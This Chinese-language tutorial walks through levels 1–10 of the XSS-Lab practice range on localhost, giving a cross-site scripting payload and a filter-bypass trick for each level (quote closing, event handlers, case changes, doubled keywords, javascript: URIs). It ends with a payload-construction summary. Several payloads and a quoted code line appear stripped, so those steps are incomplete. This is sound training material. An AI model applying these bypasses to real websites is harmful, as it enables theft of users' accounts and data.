XSS是当今网络安全事件中数量最多的攻击方式,虽然其危害性不高,但主要和其他攻击手段相结合,以实现一个复杂的攻击场景。那么,XSS是什么?
XSS全称跨站脚本(Cross Site Scripting),较合适的方式应该叫做跨站脚本攻击跨站脚本 攻击是一种常见的web安全漏洞,它主要是指攻击者可以在页面中插入恶意脚本代码,当受 害者访问这些页面时,浏览器会解析并执行这些恶意代码,被用于进行窃取隐私、钓鱼欺 骗、窃取密码、传播恶意代码等攻击。
XSS攻击使用到的技术主要为HTML和Javascript,也包括VBScript和ActionScript等。XSS 攻击对WEB服务器虽无直接危害,但是它借助网站进行传播,使网站的使用用户受到攻击,导致网站用户帐号被窃取,从而对网站也产生了较严重的危害。
近期,看到一个好玩的XSS的靶场,于是进行了实践,并做了笔记。
本教程基于XSS-Lab靶场的本地环境进行练习
环境搭建
本教程基于以下环境:
- Windows 10
- Chrome浏览器(即谷歌浏览器)
- Wamp Server
靶场运行
- 下载Wamp Server并双击安装
- 下载XSS-Lab源码,并解压,将文件夹重命名为
XSS
,放到wamp的安装目录下的www
目录中 - 打开浏览器,地址栏输入
localhost/XSS/
即可访问
实践
第一关
第一关十分简单,在地址栏的name
字段直接写payload即可:
http://localhost/xss/level1.php?name=
第二关
通过观察,可以发现字段keyword
在页面的标题和输入框内均会显示,因此,可以用两种方法插入:
1. 闭合标签
通过构造一个>
使前面的开标签闭合,接着构造一个新标签即可
http://localhost/xss/level2.php?keyword=">
2. 闭合属性双引号
通过闭合input
标签的value
属性的双引号,接着添加点击事件插入js代码来完成
地址栏输入以下带payload的链接:
http://localhost/xss/level2.php?keyword=" onclick="alert(/xss/)
点击输入框,即可实现XSS
第三关
第三关使用之前的payload已经行不通了,可以猜测是否是使用了单引号来绕过XSS插入,因此,用单引号进行尝试:
http://localhost/xss/level3.php?keyword=' onmouseover='alert(/xss/)
最后,对源码进行分析,可以看到这句代码,显示其的确是用单引号进行属性闭合的:
第四关
第四关发现标题不好注入,因此针对输入框下手:
http://localhost/xss/level4.php?keyword=" onfocus="alert(/xss/)
第五关
第五关使用之前的payload进行注入发现过滤了script
和on
:
因此,尝试使用闭合标签,构造a标签插入XSS:
http://localhost/xss/level5.php?keyword=">xss
第六关
第六关可以使用大小写绕过:
http://localhost/xss/level6.php?keyword=" ONmouseover="alert(/xss/)
第七关
使用之前的payload发现on
被替换成了空字符,因此可采用双写实现:
http://localhost/xss/level7.php?keyword=" oonnfocus="alert(/xss/)
第八关
这次代码先是将字符转换为小写,然后过滤特殊字符和双引号,最后又怕有漏网之鱼加了一 个转义函数输出,所以按常规方法绕几乎不可能成功,代码处的添加友情链接是突破点,在 input框中输入字符提交之后,在友情链接处会载入一个拼接后的a标签,因为javascript被 过滤对其进行编码绕过再点击友情链接即可。
在输入框内输入:
javascript:alert(/xss/)
第九关
这关需要匹配http://
才被认为是合法的URL,因此在输入框输入以下payload,为了不报错,在http前面加上//
表示注释:
javascript:alert(/xss/)//http://
第十关
通过观察代码,发现程序接收了t_sort
字段作为参数,并且过滤了尖括号,同时,需要将输入框显示出来:
http://localhost/xss/level10.php?keyword=Good&t_sort=xss" onclick=alert(/xss/) type="text"
总结
XSS漏洞挖掘的要点:
- URL及其参数
- 表单
- 页面任意输入、输出的地方
- 代码审计
XSS漏洞payload构造:
- 直接构造
- 通过闭合标签
- 通过闭合属性双/单引号
- 构造标签事件以绑定js程序,如:
onclick
onmouseover
onfocus
onerror
oninput
onload
href="javascript:
background=""
- 构造标签/CSS属性使访问外部链接,如:
background: url("hack url")